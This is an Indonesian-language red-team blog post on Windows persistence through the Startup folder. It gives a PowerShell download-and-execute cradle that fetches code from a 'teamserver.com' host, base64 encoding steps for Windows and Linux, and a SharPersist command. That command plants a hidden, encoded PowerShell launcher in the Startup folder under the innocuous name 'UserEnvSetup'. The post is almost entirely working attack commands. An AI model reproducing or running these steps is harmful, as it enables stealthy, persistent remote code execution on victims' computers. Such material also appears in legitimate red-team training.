Persistence via Startup Folder
Aplikasi, file dan shortcut yang berada di dalam folder startup akan dijalankan secara otomatis ketika pengguna login ke komputer tersebut.
Biasanya fitur ini digunakan untuk mem-bootstrap home environment pengguna, seperti mengatur wallpaper, shortcut, dll.
0x1 - Exploitation Stages
Step 1: Creating a PowerShell Payload
Di PowerShell:
1
2
3
4
5
# Menyimpan payload pada variable
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://teamserver.com/a"))'
# Konversi payload ke base64
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
Di Linux:
1
2
3
4
5
# Menyimpan payload pada variable
➜ set str 'IEX ((new-object net.webclient).downloadstring("http://teamserver.com/a"))'
# Konversi payload ke base64
➜ echo -en $str | iconv -t UTF-16LE | base64 -w 0
Step 2: Add Malware to Folder Startup
1
PS > .\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <base64_payload>" -f "UserEnvSetup" -m add
Keterangan:
-f
: Nama file yang akan disimpan.
Kita bisa mengakses folder startup pengguna pada direktori berikut:
1
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
0x2 - References
- https://github.com/mandiant/SharPersist
- https://azeria-labs.com/persistence/
This post is licensed under CC BY 4.0 by the author.